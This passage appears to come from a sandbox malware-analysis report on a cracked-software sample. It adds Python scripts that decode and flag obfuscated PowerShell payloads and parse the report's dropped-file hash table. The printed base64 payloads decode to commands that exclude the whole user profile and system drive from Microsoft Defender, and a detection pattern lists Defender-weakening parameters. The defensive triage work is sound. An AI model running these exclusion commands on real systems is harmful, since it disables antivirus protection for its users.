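The recoverable `-EncodedCommand` payloads in the tree above (powershell.exe PIDs 5412, 8172 and 5416; the first payload in each chain is not reproduced on this page) are base64 over UTF-16LE, which is the encoding PowerShell expects for that switch. Decoded, every one of them reads `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`, padded with meaningless `<# ... #>` block comments (`<#jdm#>`, `<#sns#>`, `<#tcy#>`, `<#afg#>` in one, `<#kwf#>`, `<#yeg#>`, `<#auv#>`, `<#hze#>` in the other) so that the base64 strings differ while the effective command is the same: exclude the entire user profile and the entire system drive from Microsoft Defender scanning. Add-MpPreference only succeeds from an elevated context, which the sandbox's `Admin` user provides. Note also that the image path is `C:\Windows\SysWOW64\...\powershell.exe` although the command line names `System32`: Eclipse.exe and crack.exe are 32-bit, so the path is rewritten by WOW64 file system redirection. The script below is an added triage example, not code from the report or from the sample; it decodes the payloads copied from this page, strips the comment junk and flags Defender tampering. The `scan_cmdline` helper, the `SAMPLE_CMDLINE` log line and the `DEFENDER_TAMPER` parameter list are this example's own choices.

```python
import base64
import re

# The two distinct -EncodedCommand values copied verbatim from the
# process tree above (powershell.exe PIDs 5412/5416 and 8172).
ENCODED_CMDS = [
    "PAAjAGoAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAbgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAYwB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAZgBnACMAPgA=",
    "PAAjAGsAdwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAZQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAdQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAegBlACMAPgA=",
]

# A powershell.exe command line constructed from the tree above, used as
# the sample log line for scan_cmdline(). Constructed input, not a log export.
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    '-EncodedCommand "' + ENCODED_CMDS[0] + '"'
)

# <# ... #> block comments; the sample uses them as junk between tokens.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)

# Add-/Set-MpPreference parameters that weaken Defender. This list is the
# example's own choice, not something the report enumerates.
DEFENDER_TAMPER = re.compile(
    r"(?i)\b(?:Add|Set)-MpPreference\b.*?-"
    r"(ExclusionPath|ExclusionProcess|ExclusionExtension|DisableRealtimeMonitoring)\b"
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_ARG = re.compile(r'-(?:encodedcommand|enc|ec|e)\b\s+"?([A-Za-z0-9+/=]+)"?', re.I)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 over UTF-16LE; PowerShell tolerates missing padding."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def normalize(script: str) -> str:
    """Drop block comments and collapse whitespace so variants compare equal."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def classify(b64: str) -> dict:
    """Decode one payload and report whether it tampers with Defender preferences."""
    script = decode_encoded_command(b64)
    clean = normalize(script)
    match = DEFENDER_TAMPER.search(clean)
    return {
        "decoded": clean,
        "defender_tamper": match is not None,
        "parameter": match.group(1) if match else None,
        "junk_comments": len(BLOCK_COMMENT.findall(script)),
    }


def scan_cmdline(cmdline: str) -> list:
    """Extract every encoded-command argument from a powershell.exe command line and classify it."""
    return [classify(b64) for b64 in ENC_ARG.findall(cmdline)]


if __name__ == "__main__":
    for hit in scan_cmdline(SAMPLE_CMDLINE):
        print(hit)
```

Comparing the normalized form rather than the raw base64 is what lets the two chains collapse to one detection: the comment padding changes the hash of every command line but not the command. The same decode is available natively on a live host as `[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64))`, and `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` shows whether the exclusion actually landed.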
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 152B
  MD5: 9ffb5f81e8eccd0963c46cbfea1abc20
  SHA1: a02a610afd3543de215565bc488a4343bb5c1a59
  SHA256: 3a654b499247e59e34040f3b192a0069e8f3904e2398cbed90e86d981378e8bc
  SHA512: 2d21e18ef3f800e6e43b8cf03639d04510433c04215923f5a96432a8aa361fdda282cd444210150d9dbf8f028825d5bc8a451fd53bd3e0c9528eeb80d6e86597
- Filesize: 152B
  MD5: e1b45169ebca0dceadb0f45697799d62
  SHA1: 803604277318898e6f5c6fb92270ca83b5609cd5
  SHA256: 4c0224fb7cc26ccf74f5be586f18401db57cce935c767a446659b828a7b5ee60
  SHA512: 357965b8d5cfaf773dbd9b371d7e308d1c86a6c428e542adbfe6bac34a7d2061d0a2f59e84e5b42768930e9b109e9e9f2a87e95cf26b3a69cbff05654ee42b4e
- Filesize: 19KB
  MD5: 1aea0a3555e0aa11fcdf612aba960b23
  SHA1: 17a314540bc816ab4c0b4943fd1af3206a66b6c0
  SHA256: 3b82bca8b33cc0cd589bc17a94c12f6e41b4646a21659ac8e4b5e9a4a16cb513
  SHA512: a57237cbd14089734c8f0495c974b9f424d06415fa99756a39e3667adad50020ea5c537b5b9081ff8135e71e529186ef6d455e2bed684fae5d3c7e281f2a3d3c
- Filesize: 1024KB
  MD5: 4322f0449af173fb3994d2bef7ecb2e4
  SHA1: b6ee5c6f76b8eee448f6b4b2b56fa1ec39653934
  SHA256: 0502e6e2f3fc54a30dea0eb07eb19a395c7ea6fc273321a49a4cc977a59b7cc9
  SHA512: d8bae6131a5a8a1fcabb2d7efebc6cdbba27955fb77484a5d87dbce7a237c0cd5e19b74b4dad28312929ad732d3b80cf3d7f15f059c88438d0bc6ff9535ceeef
- Filesize: 242KB
  MD5: f956edde726a7fcfeb3719374e05ae21
  SHA1: 2621a5d035cdf56c2e762cdddcd7ba4147afb46e
  SHA256: 189fe4b4e8fe5d24df4abded9d160251dec0dc80046ea08edec3d716c0f094e0
  SHA512: 4dbb6f109f4b5aaca90fd9d898ebea16124065822c7e451ee47ab0f62f18427427817fca5ecc5feb394c3697d3b21ad66dbc4765d69cda227d9f233fbcb8ad14
- Filesize: 39KB
  MD5: 5f8538a4c96496a08cbef532c5b0b853
  SHA1: f63f4dbc1c578d43801f516a131e40b69157ed9b
  SHA256: edff87a04b1982d56adb6e79d3c2c527925988d7ef3a2ed838b51ae00def7c23
  SHA512: 05aaacba64365dd942a48a981babb8e7571b8215c3ebea6117c57487eb7c5f1d3c9ff0d1586d888614a7c8a90713e1789fab7349fdbd51973013d73c6866fc80
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 1KB
  MD5: 5b6c777d551fe02b413685351f35470c
  SHA1: 4e331a56ada5e42d7444d0de10d9e358328b381f
  SHA256: 1ce1556149d1415ef2754ef06ebf68d68dcc5f036740513a4abb6d368f429e2a
  SHA512: f135120806c14cf8260257fa9302ed0ae09293f5a1a7c034829722a1af93e506bbeef9a01119a82d9f4631d5bcbd22ffd04ce1881fe367e288904705e8351316
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_sync.a-mo.net_0.indexeddb.leveldb\CURRENT
  Filesize: 16B
  MD5: 46295cac801e5d4857d09837238a6394
  SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
  SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
  SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
- Filesize: 15KB
  MD5: c4e4c9deae4c995677e70588ef8df38c
  SHA1: d42c013090732efeeb095e26f71e26e3f14abecb
  SHA256: a50a6726c31ebf578a82ddb935bfeb1fb777737e82497f58ef0041eb18ff95d8
  SHA512: ed11f7a9e4fdc900597832838509e53124ef6c81038dd61814f5f47249ea2c9e073195f64813044c1e3b17c482e86185faf13176471a8aba1788e35a1f2ff131
- Filesize: 20KB
  MD5: 5ba006e5306355b8e8ef514d10626057
  SHA1: 9e50102d0b7ede76f6132163d9047781ac7763fc
  SHA256: 71529093e9d1eaf1a3f42f7ee2bde40a655bfe96bfcc6f46d2dd503e4bb91cb6
  SHA512: 7cfcac3498ad943504f5501fab2b637a0f28950928015c31d5ba53253415458e8260f641178c9fd87c97e053ae0b681303916e983fc0ceb850846737f38facd9
- Filesize: 6KB
  MD5: 27d58eddb54877fbef27457afb067271
  SHA1: 96ddf544667a85043abf616fe04b6b4eabb388c6
  SHA256: 27ccbfad05ca880b964c7499c96723d445eea52cd65b3e56c0206cc48003529f
  SHA512: 885d1ea6cc105eeeab75611f2593866cf8403594084ab564dcbc72fc23c9fa7fe176f28d189e6444993bb9dbb8c80aa455fe6fec15b3e5c6c1a14a6e6d867a8d
- Filesize: 13KB
  MD5: dded7addc02129b3d15094e9004c7ca2
  SHA1: 3167ee07abf5f28d615eb089b5ccf4a3f096e3a1
  SHA256: a2595a54be3e4d05d3e49b0acf0b97d05c3b9b9eb96904447eaec690b719caf1
  SHA512: 0bd4d98df1ca247f3025aa7958d1658ca95f073627057b3fafb2263222d5688ec42e815c7d815cd60d8c0e9bc8258b4dbba20c517280f5af523458d5f8d7a8d1
- Filesize: 20KB
  MD5: 40d0f8aa917c8f293288f2d7245d0649
  SHA1: 1db8f2519aabe8e12f082408cd29c65c6407cf22
  SHA256: ed26ab2c89099afb8658b62d4c6ee16f191fe4d2ce82b77bf664bb3b5b56ecd0
  SHA512: ac4651427cee8b6a38211debd33e745e2e054a561c7a1288245d0e9e901e910f494170df28b5c6d0003e33744f5584bd939dc6d739e04c0aa5d7202534f0f0be
- Filesize: 4KB
  MD5: a93f18510627e0fe74e66988d8b6df5d
  SHA1: 280d5bbf1dacf4bd09414b2bd6675495e54c945a
  SHA256: c8d78cdbc5053baed992507b6aa4a5543037bccd2cd516f40c8c7d5ec8f29f00
  SHA512: d5f355411f1e5982f0d99f5061da6261170cd7ca2cd8590062ace600b387be48bfb4d8dcb43c80555a9b89c65658c1d498a92ed5222d80b145cf89ec0e80aa74
- Filesize: 4KB
  MD5: be64860990a3c9f9a86a42230514a913
  SHA1: 6876c1fbcbbc014fe0dfb6feb64f0e06caed59ad
  SHA256: 6622cb9f2fbf9cb4387c4c08e7deb9f0f9df56d9c172e8472fd2947fa0a96256
  SHA512: 1051f4d682c2f7a8ea07891c33ceb840f3d7d2d868ca9945c483d7c2cd9a76dc6ad09e5e1d125330c5fe49d02022281e3766f26c46ed5afcf2e5861fa51e70cf
- Filesize: 1KB
  MD5: 38536ee08c4523ce180a353bade5f0dd
  SHA1: aaebdd3f6d666c1f382622155dd0541b50bb6cb2
  SHA256: f2a54092997469f0731eb93c9e91694c163c7b5dc82d0db93b3e5247d4be91bb
  SHA512: 64ab68232990ff141e8ab968414dbd565b5bd22513517c65804b1f4672fc64235392f2894d27718994a0969a76af4d19ed91817fa917ae5c099d9154930ec7af
- Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD595294f3c09adea681206f88fc36c7916
SHA19667b2003cbf2a4f13fa5978d4df96ac6ea075f1
SHA256c1b9a5731fe5a54f582016dd82b53bfca3d85b6dc8c006b889006010d01ae801
SHA512f63b8c5289b001aa83bd19a6b1cbadffed9d0a046e14e22b0f821a0299bd540bd36c065a7cce2d66fe1b13b7c9ae7a129831e2d6375c739955df68c270d25f26
-
Filesize
12KB
MD531f61292015c32b9f0828047c4e95e87
SHA13972523f17e7416400a64aa7c07f45dd39157373
SHA256936a951d8898298b8844d37928bf1e6055b96a0db69d85328eeb6556034b5e21
SHA51200a2c3f18511a35138b8d2b9e6e24c10eb9fd3cd36ab12447f99711270630b39c16baed59901327c7a8028671919c7a59770b83713c8a909d9f2a4a83d56664d
-
Filesize
11KB
MD57959d67fc58d2f4fe03d4649f6097e43
SHA108afb41ea3b8e0c7ab005f435d7cac3699be0224
SHA25699beac05b48d243318e199cae9756f0ab237314b885dd00e195897e92f19d8ee
SHA512631c6a8e0e5d798327578e7de2b95555b519e5dc5768ea36a8bbee5ab4fa3a1d3863a49dab8f106103d5a04e6e433d24925030a4eb3877007587f4ac829f9c5a
-
Filesize
95KB
MD5f34eb034aa4a9735218686590cba2e8b
SHA12bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA2569d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af
-
Filesize
1.4MB
MD53f782cf7874b03c1d20ed90d370f4329
SHA108a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA2562a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
355KB
MD52ef91bf37b3da8cad6751b665bd4e6af
SHA15c15bbc721f91855388861d378cf9d26a140cead
SHA2565263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA51216f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3
-
Filesize
4.4MB
MD5ce453607540a4b0e0c88476042d31791
SHA19fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA2569a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee
-
Filesize
4.7MB
MD512004ffe642ec0361cd3d4a8172d41ce
SHA1a1663cd6053e0887aaa9c975f54b7f7c2fe46944
SHA256468c505bb1633c5e3f810884c1d1a68f328c656acd95d0fe3fe6663a96995b56
SHA5125ab7201f7202cb242037000b98e70f507055d702bb96c72aa2b1ff8c906df6a051643e3068685a39e31df2f8b21ab28f5e1c9902e3fefde137dc50546826b5ae
-
Filesize
14.0MB
MD5c96630864da44a58d788cea48868142b
SHA130af27c3cdc28b7e812581ea315041d986f72efc
SHA256c42173527d3da78f3bc2fb45dd1b37a1c017696868d354a807e283266dddfee8
SHA512b0a3bc7b25843bc489c61acc7d31f787cb9a5de67ce09867b09960b0593e56557e951d7021dd6a6b30f20985bc64cf1050ce05e8d2a2ca00feb0344b8a9a928f
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
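Added example, not part of the sandbox report or its tooling: a small Python checker that parses this dropped-files table in the flattened form the page extractor produced and matches a file's digests against it. The record layout it assumes is inferred from the page (a "-" line between entries, an optional path line, and each label either fused with its value or split over two lines); the three sample records are copied from the table above, and the last one carries the digests of zero-length input, which the matcher confirms by hashing `b""`. Matching is done on SHA256 rather than MD5 or SHA1 because both of those are collision-prone, with the record's other digests cross-checked when present.

```python
"""Parse a flattened sandbox dropped-files hash table and match files against it.
Added example; record layout assumed from the report text (see lead-in)."""
import hashlib
import re
from typing import Dict, List, Optional

FIELD_RE = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512)\s*(\S*)$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Constructed sample: three records copied from the report, in the same flattened
# form the extractor produced (fused "MD5<hex>" lines and split "Filesize\n16B" mixed).
SAMPLE_REPORT = """\
C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\IndexedDB\\https_sync.a-mo.net_0.indexeddb.leveldb\\CURRENT
Filesize16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
14.0MB
MD5c96630864da44a58d788cea48868142b
SHA130af27c3cdc28b7e812581ea315041d986f72efc
SHA256c42173527d3da78f3bc2fb45dd1b37a1c017696868d354a807e283266dddfee8
SHA512b0a3bc7b25843bc489c61acc7d31f787cb9a5de67ce09867b09960b0593e56557e951d7021dd6a6b30f20985bc64cf1050ce05e8d2a2ca00feb0344b8a9a928f
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""


def _store(rec: Dict[str, str], label: str, value: str) -> None:
    # Digests are normalised to lowercase hex; sizes and paths are kept verbatim.
    rec[label] = value.lower() if label in HEX_LEN else value


def parse_dropped_files(text: str) -> List[Dict[str, str]]:
    """Return one dict per record with keys path, Filesize, MD5, SHA1, SHA256, SHA512
    (only those present; most entries in the report carry no path)."""
    records: List[Dict[str, str]] = []
    cur: Dict[str, str] = {}
    pending: Optional[str] = None  # label seen alone; its value is on the next line
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":  # record separator
            if cur:
                records.append(cur)
            cur, pending = {}, None
            continue
        if pending is not None:
            _store(cur, pending, line)
            pending = None
            continue
        m = FIELD_RE.match(line)
        if m:
            label, value = m.groups()
            if value:
                _store(cur, label, value)
            else:
                pending = label
            continue
        cur["path"] = line  # anything that is not a label line is the dropped file's path
    if cur:
        records.append(cur)
    return records


def hash_problems(record: Dict[str, str]) -> List[str]:
    """Flag missing or malformed digests before a record is used as an IOC."""
    problems = []
    for label, n in HEX_LEN.items():
        v = record.get(label)
        if v is None:
            problems.append(f"missing {label}")
        elif len(v) != n or not re.fullmatch(r"[0-9a-f]+", v):
            problems.append(f"malformed {label}")
    return problems


def digests(data: bytes) -> Dict[str, str]:
    """Compute the same four digests the report lists for one file's bytes."""
    return {
        "MD5": hashlib.md5(data).hexdigest(),
        "SHA1": hashlib.sha1(data).hexdigest(),
        "SHA256": hashlib.sha256(data).hexdigest(),
        "SHA512": hashlib.sha512(data).hexdigest(),
    }


def find_record(records: List[Dict[str, str]], data: bytes) -> Optional[Dict[str, str]]:
    """Match on SHA256, then require every other digest the record carries to agree."""
    d = digests(data)
    for r in records:
        if r.get("SHA256") == d["SHA256"] and all(r.get(k, d[k]) == d[k] for k in HEX_LEN):
            return r
    return None


if __name__ == "__main__":
    recs = parse_dropped_files(SAMPLE_REPORT)
    for r in recs:
        print(r.get("path", "<no path>"), r.get("Filesize", "?"), hash_problems(r) or "ok")
    print("empty input matches last record:", find_record(recs, b"") is recs[-1])
```

To check a directory of files against the full table, paste the whole list into `parse_dropped_files` and call `find_record` with each file's bytes; the parser accepts both the fused form above and a "label value" form with a space.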